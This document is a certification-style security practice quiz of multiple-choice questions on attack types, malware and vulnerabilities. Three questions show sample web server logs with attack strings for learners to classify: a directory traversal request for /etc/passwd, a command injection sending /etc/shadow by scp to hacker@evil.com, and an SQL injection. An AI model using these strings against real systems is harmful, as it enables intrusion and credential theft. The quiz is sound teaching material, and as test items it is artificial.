Domain 1 Quiz

Domain 1 Quiz

1. Assign the attack names at right to the descriptions at left. You use each attack name once. Something like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
   1. Walking down the street, you get advertising messages from stores you are walking past
   2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
   3. You receive text messages containing random advertisements
   4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak

   1. SPIM
   2. Bluesnarfing
   3. Vishing
   4. Bluejacking
2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
   1. Improper account configuration
   2. Memory leak
   3. Buffer overflow
   4. Integer overflow
   5. Race condition
3. You observe the following.

   66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
   54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
   174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
   174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
   66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
   

   What type of attack has happened?
   1. SQL Injection
   2. Directory Traversal
   3. Buffer Overflow
   4. Command Injection
4. You observe the following.

   66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
   54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
   174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
   174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
   66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
   

   What type of attack has happened?
   1. SQL Injection
   2. Directory Traversal
   3. Buffer Overflow
   4. Command Injection
5. You observe the following.

   66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
   54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
   174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
   174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
   66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
   

   What type of attack has happened?
   1. SQL Injection
   2. Directory Traversal
   3. Buffer Overflow
   4. Command Injection
6. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
   1. SQL Injection
   2. Directory Traversal
   3. Buffer Overflow
   4. Command Injection
7. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
   1. Clickjacking
   2. Ransomware
   3. Crimeware
   4. Extortionware
   5. Spyware
8. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
   1. False-positive event
   2. False-negative event
   3. Zero-day event
   4. IDS failure event
   5. IPS failure event
9. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
   1. APT
   2. Rootkit
   3. Rogue AP
   4. Replay
10. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
    1. Misconfigured account
    2. Untrained user
    3. Inadequate input validation
    4. Memory leak
11. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer, in fact you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
    1. Nothing, your ISP is wrong
    2. RAT
    3. BOT
    4. Trojan
12. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
    1. Improper input handling
    2. Inadequate error handling
    3. Support beyond end-of-life
    4. Default configurations
13. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She had identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
    1. Driver masquerading
    2. Shimming
    3. Driver refactoring
    4. Data flow manipulating
14. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
    1. Active reconnaissance
    2. Passive reconnaissance
    3. Open-source analysis
    4. Pivoting
15. Jermain is fielding help desk reports of WLAN clients repeatedly dissociating from their WAPs, and having to reassociate. What may be responsible? Select two
    1. Bluesnarfing
    2. Jamming
    3. War driving
    4. Channel conflicts
    5. SSID loss
16. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
    1. Refactoring
    2. Shimming
    3. Masquerading
    4. Modifying
17. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
    1. Embedded systems
    2. EOL
    3. IoT
    4. Input validation
    5. Error handling
18. George's manager needs to give a presentation to the board of directors, telling them about the most critical threat to the organization. What should George make sure is highlighted?
    1. Asset management
    2. Insider threat
    3. Social media
    4. Baseline deviations
    5. Performance
    6. Unauthorized software
19. Why might you use fuzzing? Select two.
    1. You need to detect logical errors
    2. You don't have the source code
    3. You have the source code
    4. You have the source code, but you signed a non-disclosure agreement
    5. You're uncertain of the purpose of the software
20. Refineries and waste water treatment plants are controlled by which of the following, which have been successfully attacked on multiple occasions:
    1. RTOS
    2. IoT
    3. SCADA
    4. SoC
    5. Embedded

To the answers

Exhibit with 4 items plus 19 more questions

Passing = 82% of 23 = 18.9

Goal = 91% of 23 = 20.9